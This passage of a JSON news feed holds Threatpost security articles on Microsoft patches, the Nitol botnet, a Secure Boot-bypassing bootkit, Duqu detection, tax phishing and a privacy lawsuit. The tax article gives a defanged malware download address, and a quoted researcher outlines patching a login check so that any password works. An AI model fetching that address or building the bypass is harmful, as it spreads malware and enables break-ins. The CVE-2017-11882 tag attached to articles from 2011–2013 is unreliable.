Someone should tell Microsoft they forgot to include the kitchen sink.\u201d\n", "cvss3": {}, "published": "2013-12-05T16:07:42", "type": "threatpost", "title": "TIFF Zero Day Patch Among December 2013 Microsoft updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-12-05T21:07:43", "id": "THREATPOST:1256E9A9997A1C51E9DB7AEB7A420D3D", "href": "https://threatpost.com/microsoft-to-patch-tiff-zero-day-wait-til-next-year-for-xp-zero-day-fix/103117/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:20", "description": "Microsoft announced Wednesday afternoon that it has pulled [MS13-061](<https://technet.microsoft.com/en-us/security/bulletin/ms13-061>), one of the patches issued yesterday for vulnerabilities in Exchange Server 2013.\n\nMicrosoft said the patch is causing issues with the content index for mailbox databases. Organizations would still be able to send and receive email, but would not be able to search for messages on the server.\n\n\u201cAfter the installation of the security update, the content index for mailbox databases shows as Failed and the Microsoft Exchange Search Host Controller service is renamed,\u201d Microsoft principal program manager Ross Smith said in a [post](<http://blogs.technet.com/b/exchange/archive/2013/08/14/exchange-2013-security-update-ms13-061-status-update.aspx>) on the company\u2019s Exchange site.\n\nSmith added that patches for Exchange 2007 and 2010 were not pulled back because both use a different indexing architecture and are not impacted.\n\nOrganizations that have already installed the patch are urged to follow the steps outlined in a [Knowledge Base article](<http://support.microsoft.com/kb/2879739>) released today as a workaround until a new patch is available. 
The workaround involves the editing of two separate registry keys.\n\nExperts, however, think the number of companies immediately applying the patch could be relatively low given the criticality of Exchange servers to enterprises. Most likely, an Exchange patch, even a critical one, would have been reserved for a maintenance window overnight or on a weekend.\n\nThe patch was essentially the integration of an Oracle patch released last month for Outside In, a technology that turns unstructured file formats such as PDFs into normalized files. Outside In is part of Exchange\u2019s WebReady Document Viewing and Data Loss Prevention features.\n\nAn attacker would be able to exploit the vulnerability in question if a user opened or previewed a malicious file attachment using Outlook Web Access (OWA), giving the attacker the same privileges as the victim on the Exchange Server.\n\n\u201cThis is a fairly important patch in terms of criticality given that it\u2019s the mail server and not a workstation,\u201d said Qualys CTO Wolfgang Kandek.\n\nThe issue is amplified because with the OWA module on Exchange, the browser pulls a message into Exchange and, using Outside In, processes the message on Exchange, exposing the server to attack.\n\nKandek said organizations that don\u2019t allow OWA or turn off a visualization mode that renders documents are not affected; documents such as PDFs instead would be processed by a reader such as Adobe or Foxit, avoiding the attack vector.\n\nIn the meantime, Kandek said he hopes Microsoft is transparent about the reason for the faulty patch and why it wasn\u2019t caught in testing.\n\n\u201cI think it\u2019s important because we tell people they should install patches as quickly as possible,\u201d Kandek said. 
\u201cWhen a patch breaks, that\u2019s an issue.\u201d\n\nThe Exchange patch was one of three critical bulletins sent out yesterday in Microsoft\u2019s August Patch Tuesday updates.\n", "cvss3": {}, "published": "2013-08-14T16:51:00", "type": "threatpost", "title": "Faulty Microsoft Exchange Server 2013 Patch Pulled Back", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-14T20:51:00", "id": "THREATPOST:44FF4D429457B43FB0FEA96C9A0DE58C", "href": "https://threatpost.com/microsoft-pulls-back-critical-exchange-server-2013-patch/101999/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:20", "description": "Microsoft took less than a month to incorporate an [Oracle Outside In patch](<http://threatpost.com/hefty-oracle-july-critical-patch-update-contains-89-patches/101370>) and fix a critically rated remote code execution bug in Exchange Servers. The Microsoft patch is among three critical bulletins\u2014eight overall\u2014released today as part of [its August 2013 Patch Tuesday security updates](<http://blogs.technet.com/b/msrc/archive/2013/08/13/leaving-las-vegas-and-the-august-2013-security-updates.aspx>).\n\nOracle patched Outside In with its [July Critical Patch Update (CPU)](<http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html#AppendixFMW>); the technology allows developers to turn unstructured file formats into normalized files. [MS13-061](<https://technet.microsoft.com/en-us/security/bulletin/ms13-061>) includes the Outside In Patch, which is part of the WebReady Document Viewing and Data Loss Prevention features on Exchange Servers. Exploits could allow an attacker to remotely execute code if a user previews or opens a malicious file using Outlook Web App (OWA). 
The attacker would have the same privileges as the transcoding services on the Exchange Server; that would be the LocalService account for WebReady Document Viewing and the Filtering Management service for the DLP feature. Both, however, run with minimal privileges.\n\n\u201cIf you run Exchange and your users have OWA, you should address this issue as quickly as possible,\u201d said Qualys CTO Wolfgang Kandek. Microsoft also recommends a workaround that turns off Outside In document processing.\n\n[MS13-059](<https://technet.microsoft.com/en-us/security/bulletin/ms13-059>) is another cumulative patch for Internet Explorer and repairs 11 remotely executable vulnerabilities in the browser, including a sandbox bypass vulnerability discovered and exploited by VUPEN researchers during the Pwn2Own contest in March. IE 6-10 is vulnerable to exploit; Microsoft said it is not aware of any active exploits for any of these vulnerabilities.\n\nThe IE rollup includes patches for nine memory corruption vulnerabilities, as well as fixes for a privilege escalation flaw in the way in which the browser handles process integrity level assignment and an information disclosure cross-site scripting vulnerability in EUC-JP character encoding, Microsoft said.\n\n\u201cAs usual with IE vulnerabilities, the attack vector would be a malicious webpage, either exploited by the attacker or it could be sent to the victim in a spear-phishing e-mail,\u201d Kandek said. \u201cPatch this immediately as the highest priority on your desktop system and wherever your users browse the web.\u201d\n\nThe final critical bulletin, [MS13-060](<https://technet.microsoft.com/en-us/security/bulletin/ms13-060>), patches a Windows vulnerability in the Unicode Scripts Processor; the patch corrects the way Windows parses certain OpenType font characteristics. 
An exploit could allow an attacker to run code remotely if a user opens a malicious document or visits a website that supports OpenType fonts.\n\n\u201cA user would have to be induced to open a malicious file and this only affects Windows XP and 2003,\u201d said Ross Barrett, senior manager of security engineering at Rapid7. \u201cBoth of these issues should be patched ASAP.\u201d Microsoft also recommends two workarounds: either modifying the usp10.dll Access Control List to be more restrictive, or disabling support for parsing embedded fonts in IE.\n\nThe remaining bulletins were all rated Important by Microsoft.\n\n * [MS13-062](<https://technet.microsoft.com/en-us/security/bulletin/ms13-062>) patches a privilege escalation vulnerability in Windows RPC, correcting the manner in which Windows handles asynchronous RPC messages. \u201cPerhaps the most genuinely interesting vulnerability this month,\u201d Barrett said, adding that the bug is a post authentication issue in RPC. \u201cMicrosoft has described this as extremely difficult to exploit, which I can only assume is a challenge to exploit writers everywhere to prove them wrong.\u201d\n * [MS13-063](<https://technet.microsoft.com/en-us/security/bulletin/ms13-063>) is another privilege escalation issue in the Windows kernel. Four vulnerabilities are patched in this bulletin, the most severe of which enables elevated privileges if an attacker is able to log in locally and run a malicious application. In addition to memory corruption bugs, one of the vulnerabilities in this bulletin enables an attacker to bypass Address Space Layout Randomization (ASLR), a memory protection native to the OS.\n * [MS13-064](<https://technet.microsoft.com/en-us/security/bulletin/ms13-064>) patches a denial of service vulnerability in Windows NAT Driver. 
An attacker would have to send a malicious ICMP packet to a server running the NAT Driver services in order to exploit this bug, which affects only Windows Server 2012.\n * [MS13-065](<https://technet.microsoft.com/en-us/security/bulletin/ms13-065>) also fixes a denial of service bug in ICMPv6; Vista, Windows Server 2008, Windows 7, Windows 8, Windows RT and Windows Server 2012 are affected by this bug.\n * [MS13-066](<https://technet.microsoft.com/en-us/security/bulletin/ms13-066>) patches an information-disclosure vulnerability in Active Directory Federation Services on Windows Server 2008 and Windows Server 2012. An exploit could force the service to leak information on the service and allow an attacker to use that information to try to log in remotely.\n", "cvss3": {}, "published": "2013-08-13T14:28:51", "type": "threatpost", "title": "August 2013 Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-13T18:28:51", "id": "THREATPOST:270516BE92D218A333101B23448C3ED3", "href": "https://threatpost.com/microsoft-august-patch-tuesday-addresses-critical-ie-exchange-and-windows-flaws/101981/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:22", "description": "Another month, another set of [Microsoft Patch Tuesday security updates](<http://technet.microsoft.com/en-us/security/bulletin/ms13-aug>) for Internet Explorer.\n\nFor what seems to be the umpteenth month in a row, Microsoft will patch its browser, one of three critical updates expected to be shipped on Tuesday among eight bulletins.\n\nWhile IE patches remain a constant in 2013, IT administrators and network managers also need to be aware of a critical set of patches for Microsoft Exchange Server 2013, as well as 2010 and 2007, both of which are on Service Pack 3.\n\nThe critical bugs in IE, Exchange Server and the Windows OS are all rated critical 
because they are remotely exploitable; it\u2019s unknown today how many are being actively exploited.\n\n\u201cAcross the board, all supported versions of Microsoft Exchange Server are affected by a critical vulnerability,\u201d said Tripwire security researcher Craig Young. \u201cIf I remember correctly, the last time we saw this was back in February when it was revealed that the transcoding service used to render content for Outlook Web Access sessions could be abused for remote code execution in the context of that service. Exchange servers are invariably connected to the Internet in some form or another so it\u2019s going to be urgent to patch this one post-haste.\u201d\n\n[MS13-012](<http://technet.microsoft.com/en-us/security/bulletin/ms13-012>), released in February, patched [vulnerabilities in the Exchange WebReady Document Viewing](<http://threatpost.com/microsoft-patches-critical-ie-vulnerabilities-021213/77519>) feature; if a user viewed a malicious file through OWA in a browser, an attacker could run code on the Exchange server remotely or crash the server.\n\nRoss Barrett, senior manager of security engineering at Rapid7, said the Exchange patches should be of the greatest concern to organizations.\n\n\u201cIf this is truly a remotely exploitable issue that does not require user interaction, then it\u2019s a potentially wormable issue and definitely should be put at the top of the patching priority list,\u201d Barrett said.\n\nIE, meanwhile, is about to be patched for the eighth time this year including an [out-of-band patch](<http://threatpost.com/out-band-ie-patch-released-more-sites-attacked-011413/77403>) in January to address exploits being used in a number of watering hole attacks.\n\nThe third critical bulletin addresses vulnerabilities in Windows XP and Windows Server 2003 that are remotely exploitable.\n\n\u201cFor some organizations this patch may be of less concern, if they have already moved to newer Windows versions,\u201d Barrett 
said.\n\nThe remaining bulletins are rated \u201cImportant\u201d by Microsoft based on whether they are remotely exploitable and whether exploits are in the wild. All of the \u201cImportant\u201d bulletins patch vulnerabilities in Windows; two of them are privilege escalation bugs, two are denial-of-service vulnerabilities and one is an information disclosure flaw.\n", "cvss3": {}, "published": "2013-08-08T15:28:06", "type": "threatpost", "title": "August 2013 Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-16T18:07:04", "id": "THREATPOST:4C788DAABFE70AE1D1483D4039B3767E", "href": "https://threatpost.com/critical-ie-exchange-updates-on-tap-in-august-patch-tuesday-release/101943/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:02", "description": "When Microsoft went after the [Nitol botnet](<https://threatpost.com/microsoft-carries-out-nitol-botnet-takedown-091312/>) in September, one of the key details in the investigation was the fact that much of the botnet was built by pre-loading malware onto laptops during the manufacturing process in China. This was the clearest case yet of the phenomenon of [certified pre-owned devices](<https://threatpost.com/new-study-sees-need-better-software-integrity-controls-061410/>) making their way through the supply chain and into the market. As it turns out, nearly half a million of those infected machines showed up here in the U.S.\n\nResearch from Microsoft into the location of the Nitol-infected machines shows that the large majority of them are in China, nearly 800,000 of them. 
That\u2019s more than 30 percent of all of the machines on which Microsoft detected the Nitol malware, and the company said that about one in every five machines purchased in China through the compromised supply chain had malware on it.\n\nAlthough the number of infected systems in the United States wasn\u2019t nearly as high as in China, Microsoft did find nearly 500,000 PCs in the U.S. loaded with Nitol, a pretty significant volume of infections.\n\n\u201cMMPC\u2019s infection figures for [Win32/Nitol](<http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Win32/Nitol> \"MMPC Encyclopedia entry for Win32/Nitol\" ) reflect the Microsoft study, placing China on the top spot with a whopping 31.60%, way above the United States (18.51%) and Taiwan (16.79%). Thailand and Korea round out the top five,\u201d [Rex Plantodo of the Microsoft Malware Protection Center](<https://blogs.technet.com/b/mmpc/archive/2012/10/22/msrt-october-12-nitol-by-the-numbers.aspx?Redirected=true>) wrote.\n\nMicrosoft began looking into the Nitol botnet more than a year ago after buying 20 laptops in China and discovering that some of them had been pre-loaded with the Nitol malware, as well as a few other pieces of malicious software. Nitol is a nasty bit of code and has quite a list of malicious capabilities. It has rootkit functionality and also can launch DDoS attacks on orders from a remote command-and-control server.\n\nMicrosoft\u2019s takedown of Nitol disrupted much of the botnet\u2019s operations, but it didn\u2019t completely eliminate it. 
The company\u2019s detections show a major drop in Nitol infections since September, but there are still more than 200,000 infections in October.\n\n \n\n", "cvss3": {}, "published": "2012-10-24T17:59:06", "type": "threatpost", "title": "Nitol Infections Fall, But Malware Still Popping Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:20", "id": "THREATPOST:C35731BF3D4A3F8D0B1A838FAD1A8832", "href": "https://threatpost.com/nitol-infections-fall-malware-still-popping-102412/77149/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:08", "description": "Microsoft will release seven bulletins in the [October Patch Tuesday](<http://technet.microsoft.com/en-us/security/bulletin/ms12-oct>) next week, fixing 20 total vulnerabilities in Windows, Office, Lync and SQL Server. Only one of the bulletins is rated critical, while the six others are rated important.\n\nThe one critical bulletin affects Microsoft Office 2003, 2007 and 2010 and Microsoft officials said that the bug it will fix can be used for remote code execution. The remaining six bulletins, which all are rated important, also can be used for remote code execution. \n\nThe other software affected by the October bulletins includes SharePoint, Groove Server, SQL Server 2000, 2005, 2008 and 2012. \n\nThe one critical bulletin will fix a flaw in Microsoft Word, company officials said.\n\n\u201cToday we\u2019re providing [advance notification](<http://technet.microsoft.com/security/bulletin/ms12-oct>) of the release of seven bulletins, one Critical and six Important, which address 20 vulnerabilities for October 2012. The Critical bulletin addresses vulnerabilities in Microsoft Word. The six Important-rated bulletins will address issues in Windows, Microsoft Office, and SQL Server. 
This release will also address the issue in FAST Search Server first described in [Security Advisory 2737111](<http://technet.microsoft.com/security/advisory/2737111>),\u201d Dustin Childs of Microsoft said.\n\nThat bug in FAST Search Server first came to light in July and also existed in Microsoft Exchange Server. \n\n\u201cThe vulnerabilities exist due to the way that files are parsed by the third-party, Oracle Outside In libraries. In the most severe case of Microsoft Exchange Server 2007 and Microsoft Exchange Server 2010, it is possible under certain conditions for the vulnerabilities to allow an attacker to take control of the server process that is parsing a specially crafted file. An attacker could then install programs; view, change, or delete data; or take any other action that the server process has access to do,\u201d Microsoft said in its security advisory at the time.\n", "cvss3": {}, "published": "2012-10-04T18:28:36", "type": "threatpost", "title": "Microsoft to Fix Critical Word Flaw in October Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:25", "id": "THREATPOST:A054939E56572665B8DD31C2FF1D6A79", "href": "https://threatpost.com/microsoft-fix-critical-word-flaw-october-patch-tuesday-100412/77083/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:03", "description": "Microsoft plans to issue seven security bulletins in the [January Patch Tuesday](<https://technet.microsoft.com/en-us/security/bulletin/ms12-jan>) release next week, fixing six vulnerabilities rated important and one rated critical. The bugs affect a variety of products, including Windows XP, Vista, Windows 7, Server 2003 and 2008 and Microsoft Developer Tools and Software.\n\nJust three of the seven bulletins Microsoft will issue on Jan. 
10 will fix a vulnerability that could lead to remote code execution. The others can either lead to elevation of privilege or information disclosure. However, there is one bulletin that Microsoft has said can also lead to \u201csecurity feature bypass,\u201d something that isn\u2019t typically seen on the company\u2019s security bulletins.\n\n\u201cIn addition, eagle-eyed readers of the summary page will notice an unusual vulnerability classification, \u2018Security Feature Bypass,\u2019 for one of our Important-severity bulletins. SFB-class issues in themselves can\u2019t be leveraged by an attacker; rather, a would-be attacker would use them to facilitate use of another exploit. For those interested in learning more, we expect the SRD blog to publish a detailed analysis of the matter on Tuesday,\u201d Microsoft\u2019s Angela Gunn wrote in a blog post.\n\nThe company will release full information on the patches and which vulnerabilities they apply to on Tuesday.\n", "cvss3": {}, "published": "2012-01-06T15:08:03", "type": "threatpost", "title": "Microsoft to Issue Seven Bulletins, One Critical, on Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:02", "id": "THREATPOST:EFE8A853C0EEF9ED023CC92349BE9410", "href": "https://threatpost.com/microsoft-issue-seven-bulletins-one-critical-patch-tuesday-010612/76067/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:21", "description": "A security researcher who has in the past created low-level rootkits capable of staying resident on an infected machine after reboots, said he has now accomplished the same feat on Windows 8, which hasn\u2019t even hit the shelves yet. 
Peter Kleissner said he has created a new version of his Stoned bootkit that defeats the pre-boot security checks included in the forthcoming OS and survives reboots.\n\nKleissner is known in the security community for his creation of the [Stoned bootkit](<http://www.stoned-vienna.com/>), a sophisticated form of rootkit that is designed to load from the master boot record and stay resident in memory throughout the boot process. The previous version of the bootkit was designed to work on Windows XP through Windows 7, but the new one that Kleissner has written also works on Windows 8. He said in a message on Twitter Thursday that Stoned Lite is a small footprint bootkit that can be loaded from either a USB stick or a CD.\n\nHe said he may also add some other functionality to the software in the near future.\n\n\u201cMight add in-memory patching of msv1_0!MsvpPasswordValidate, so it allows to log on with any password.. nothing new but nice and fancy,\u201d Kleissner said in a later Twitter message.\n\nThe pre-boot security mechanisms in Windows 8 have drawn a lot of scrutiny in recent months, particularly the fact that [Microsoft is implementing a version of UEFI](<https://threatpost.com/secure-boot-windows-8-worries-researchers-092211/>) instead of the traditional BIOS. UEFI includes some functionality that allows Microsoft to require that any software loaded during the boot sequence of a Windows PC be signed by one of the keys loaded into the firmware. 
Open-source advocates have argued that the technology could allow the company to prevent users from loading alternate operating systems, but Microsoft and [officials from the Linux Foundation](<https://threatpost.com/linux-foundation-says-uefi-doesnt-have-prevent-other-os-installations-110111/>) have said that isn\u2019t necessarily the case.\n\nKleissner said that he notified Microsoft of his work and has given the company the source code of the bootkit and the paper he\u2019s written for a conference presentation.\n\nMicrosoft has not confirmed the details of Kleissner\u2019s claims.\n", "cvss3": {}, "published": "2011-11-17T20:42:19", "type": "threatpost", "title": "New Version of Stoned Bootkit Said to Bypass Windows 8 Secure Boot", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:19", "id": "THREATPOST:4BAED737182ECF19718520A7258DFDAA", "href": "https://threatpost.com/new-version-stoned-bootkit-said-bypass-windows-8-secure-boot-111711/75909/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:25", "description": "The Hungarian research facility that helped discover Duqu, the [much-blogged about](<https://threatpost.com/new-toolkit-able-track-and-trace-duqu-worm-111011/>) Trojan, has now released an open-source toolkit that can be used to help detect traces and instances of the worm.\n\nThe Laboratory of Cryptography and System Security (CrySys) at the Budapest University of Technology and Economics developed the [Duqu Detector Toolkit v1.01](<http://www.crysys.hu/duqudetector.html>) to be used on computers and networks where the malware may have already been removed from the system. Duqu \u2013 a cousin of the Stuxnet worm that infected uranium enrichment facilities in Iran, famously had a hard-coded 36 day lifespan. 
But systems may still retain certain Duqu files even after the virus has deactivated itself. By focusing on what they refer to as \u201csuspicious files,\u201d the toolkit can \u201cdetect new, modified versions of the Duqu threat,\u201d CrySys said. \n\nLike other toolkits, CrySys claims the tool could still generate false positives and therefore encourages that a professional look over the log files of each test.\n\nAs Threatpost [previously reported](<https://threatpost.com/duqu-installer-contains-windows-kernel-zero-day-110111/>), users can be infected with Duqu after opening a particular Word document that exploits a flaw in Windows\u2019 Win32k TrueType font parsing engine and leads to remote code execution. Microsoft has maintained they\u2019re working on a patch for the bug but in the meantime, [released a workaround](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>) for the kernel flaw late last week.\n", "cvss3": {}, "published": "2011-11-10T16:17:49", "type": "threatpost", "title": "New Toolkit Able to Track and Trace Duqu Worm", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:22", "id": "THREATPOST:30DA1C9D6157103537A72208FA5F0B5D", "href": "https://threatpost.com/new-toolkit-able-track-and-trace-duqu-worm-111011/75879/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:45", "description": "Redmond, Washington software giant Microsoft and Detroit-based GM subsidiary OnStar backtracked on policies widely seen as egregious privacy violations following lawsuits and public outcry. 
Here\u2019s the news:\n\n**Windows Phone Update Requires User Consent For Tracking**\n\nMicrosoft released their \u201cMango\u201d update, which, according to a report by Tom Warren on [Winrumors](<http://www.winrumors.com/windows-phone-7-5-no-longer-accesses-location-data-without-authorization/>), updates the Windows Phone, addressing widespread accusations and [a related lawsuit](<https://threatpost.com/class-action-lawsuit-accuses-microsoft-illegal-geotagging-090211/>) that the company had been tracking device locations without reasonable consent.\n\nIn a location and privacy FAQ on the Microsoft website, the company staunchly claims that the location information stored within the Windows Phone 7 devices is intended to gather information about nearby Wi-Fi access points and provide users with location based services more efficiently and effectively; this information does not uniquely identify or track devices, they say.\n\nHowever, the company also says they discovered that some of that information had been periodically relayed back to Microsoft when users access the camera application and use its US-English voice command feature. (Whoops!) This relay of information, Microsoft claims, is an unintended behavior. The latest update resolves these and other issues. Now users will have to agree if they want the Camera application to tag photo locations. 
Voice Command will no longer request location information at all.\n\nFor more information, read the FAQ [here](<http://www.microsoft.com/windowsphone/en-us/howto/wp7/web/location-and-my-privacy.aspx>).\n\n**OnStar Won\u2019t Force Automated Location Tracking**\n\nOnStar found itself in a similar situation after it was discovered that the vehicle navigation and emergency notification service was to begin [monitoring the speed and location of vehicles](<https://threatpost.com/onstar-track-speed-location-cars-even-after-opting-out-092111/>) equipped with OnStar technology on December 1, even if those owners decided to opt out or cancel OnStar\u2019s services.\n\nA press release published yesterday on the OnStar website announced that the company is revising their proposed terms and conditions to make it clear that customer data will not be collected after a customer cancels their OnStar service.\n\n\u201cWe realize that our proposed amendments did not satisfy our subscribers,\u201d OnStar President Linda Marshall said in the statement. \u201cThis is why we are leaving the decision in our customers\u2019 hands. We listened, we responded and we hope to maintain the trust of our more than 6 million customers.\u201d\n\nThe appearance of GPS and other location tracking technologies in mobile phones, cars and other devices has [raised concerns among privacy and civil liberties advocates in the U.S. and elsewhere](<https://threatpost.com/location-based-services-raise-privacy-security-risks-082510/>). An analysis by the Wall Street Journal found that iPhones running version 4 of the company\u2019s iOS operating system appeared to [track a user\u2019s location and movement](<https://threatpost.com/report-iphones-track-movement-even-location-services-disabled-042511/>) regardless of whether the user enabled or disabled location tracking. 
Like Microsoft, Apple claimed that the phones weren\u2019t tracking specific users\u2019 movements, just using the company\u2019s huge user base to assemble an accurate list of active cell phone towers and WiFi hotspots. Software vendors, also, have been discovered to be collecting location data, often quite apart from the kind of service they are providing. In just one example, the mobile phone application for the Pandora music streaming service was [found to be harvesting user location data](<https://threatpost.com/pandora-mobile-app-transmits-gobs-personal-data-040611/>). \n\nSecurity experts have wondered, aloud, [how else the company might use the location and movement data that is collected](<https://threatpost.com/iphones-location-and-threats-your-assets-042711/>), including how it might be used by third party advertisers. \n", "cvss3": {}, "published": "2011-09-28T18:07:32", "type": "threatpost", "title": "Blowback: Microsoft, OnStar Pump the Brakes on Location Tracking", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T20:07:09", "id": "THREATPOST:6E270592F88355DEABA14BF404C7EDDE", "href": "https://threatpost.com/blowback-microsoft-onstar-pump-breaks-implicit-gps-tracking-092811/75700/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:56", "description": "Microsoft warned Monday this year\u2019s crop of tax scams is using social engineering attacks based on fear to spread Zdowbot and Omaneat banking Trojans and collect personal info via spoofed tax sites linked to from phishing campaigns.\n\nThe warning comes with less than a month before the April 18 tax deadline and adds to an already busy tax season of scams reported by various security experts and the U.S. 
Internal Revenue Service.\n\n\u201cThese attacks circulate year-round as cybercriminals take advantage of the different country and region tax schedules, but they peak in the months leading to U.S. Tax Day in mid-April,\u201d warned Microsoft on its [Malware Protection Center blog](<https://blogs.technet.microsoft.com/mmpc/2017/03/20/tax-themed-phishing-and-malware-attacks-proliferate-during-the-tax-filing-season/>).\n\nEmail ploys reported by Microsoft include messages with the subject lines \u201cYou are eligible!\u201d and \u201cConfirmation of your tax refund\u201d and \u201cSubpoena from IRS\u201d. Microsoft says scammers are also targeting certified public accountants with the email subject line \u201cI need a CPA\u201d.\n\nIn one tax-based scam example, Microsoft found a malicious Word document contained in an email that warns recipients they face pending tax-related law enforcement action. A malicious Word document, identified as a subpoena, accompanies the email. If the file attachment is opened, the Word document displays in a Protected View mode and prompts the target of the attack to enable editing.\n\n\u201cIf Enable Editing is clicked, malicious macros in the document download a malware detected as TrojanDownloader:Win32/Zdowbot.C,\u201d Microsoft said. Next, attackers attempt to install malware that is part of the Zdowbot family of Trojan downloaders.\n\nAnother scam targets CPA tax preparation experts in hopes of infecting PCs filled with third-party tax data with the Omaneat family of info-stealing malware. Emails with the subject line \u201cI need a CPA\u201d contain the fraudulent plea: \u201cI need a careful and experienced high quality accountant, to handle all matters of accounting including tax preparation..\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06225813/Tax-social-engineering-email-malware-1.png>)\n\nThe email includes an attachment called \u201ctax-infor.doc\u201d that contains malicious macro code. 
If a recipient ignores Microsoft\u2019s warning message regarding not enabling content, the malicious macro downloads the malware TrojanSpy:MSIL/Omaneat from hxxp://193[.]150[.]13[.]140/1.exe. \u201cThese threats can log keystrokes, monitor the applications you open, and track your web browsing history,\u201d according to Microsoft.\n\nTax scammers are also luring victims with threats. One email reads \u201cInfo on your debt and overdue payments\u201d in the subject line. Emails don\u2019t include attachments, rather they include warnings from the sender that purports to be from the IRS and its Realty Tax Department. The email prompts recipients to visit a website that contains a personalized report on their delinquent realty taxes. The message warns action is needed within 24 hours to avoid \u201csignificant charges and fines.\u201d The link is to a phishing page.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06225809/Tax-social-engineering-email-malware-7.png>)\n\n\u201cAs the examples show, phishing and malware attacks target both professional and individual taxpayers,\u201d Microsoft said. It cited media reports of a recent government contractor that fell victim to a spear phishing scam, resulting in the exposure of current and former employees\u2019 sensitive tax information.\n\n\u201cThese attacks rely on social engineering tactics \u2014 you can detect them if you know what to look for. Be aware, be savvy, and be cautious in opening suspicious emails. 
Even if the emails came from someone you know, be wary about opening the attachment or clicking on links,\u201d Microsoft said.\n", "cvss3": {}, "published": "2017-03-21T11:54:32", "type": "threatpost", "title": "Latest Tax Scams Include Phishing Lures, Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-03-25T16:42:36", "id": "THREATPOST:537A21C79E24E9981AD8200320B7D46F", "href": "https://threatpost.com/latest-tax-scams-include-phishing-lures-malware/124431/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:29", "description": "Microsoft\u2019s lawsuit against the U.S. government for the right to tell its customers when a federal agency is looking at their emails is getting widespread support from privacy advocates. For many, Microsoft\u2019s stance lends an important and powerful voice to ongoing efforts to reform the Electronic Communications Privacy Act that is at the heart of Microsoft\u2019s beef with the government. \n\n\u201cWe applaud Microsoft for challenging government gag orders that prevent companies from being more transparent with their customers about government searches of their data,\u201d said Andrew Crocker, staff attorney with the Electronic Frontier Foundation. \n\nFor Crocker and Microsoft, the stance is tied to bigger issues such as free speech and First Amendment rights. \u201cIn nearly all cases, indefinite gag orders and gag orders issued routinely rather than in exceptional cases are unconstitutional prior restraints on free speech and infringe on First Amendment rights,\u201d he said. \n\nThe software giant\u2019s chief legal officer Brad Smith said Microsoft has been required to maintain secrecy about more than 2,500 legal demands over the past 18 months. More than 1,752 (68 percent) of those secrecy orders had no end date. 
Smith noted that, \u201cThis means we effectively are prohibited forever from telling our customers that the government has obtained their data.\u201d \n\nMicrosoft\u2019s lawsuit challenges the gag order provision in the Electronic Communications Privacy Act (ECPA) that allows courts to force companies that offer cloud storage to say nothing when asked to turn over customer data. Reforms of ECPA have long been sought by privacy advocates such as the Electronic Privacy Information Center. \n\nAlan Butler, senior counsel at the Electronic Privacy Information Center, said that such secret orders by the government should be the exception, but increasingly the requests have become the rule. \u201cNotice is one of the key protections provided under the Fourth Amendment, and law enforcement efforts to delay or otherwise restrict notice should be viewed skeptically by the courts,\u201d he said. \n\nThe ACLU used Microsoft\u2019s lawsuit as an opportunity to call on Congress to implement reforms to the Electronic Communications Privacy Act. \u201cIf Congress fails to include those changes as it considers ECPA reform, then the courts should step in, including in Microsoft\u2019s case, to end the government\u2019s constitutional 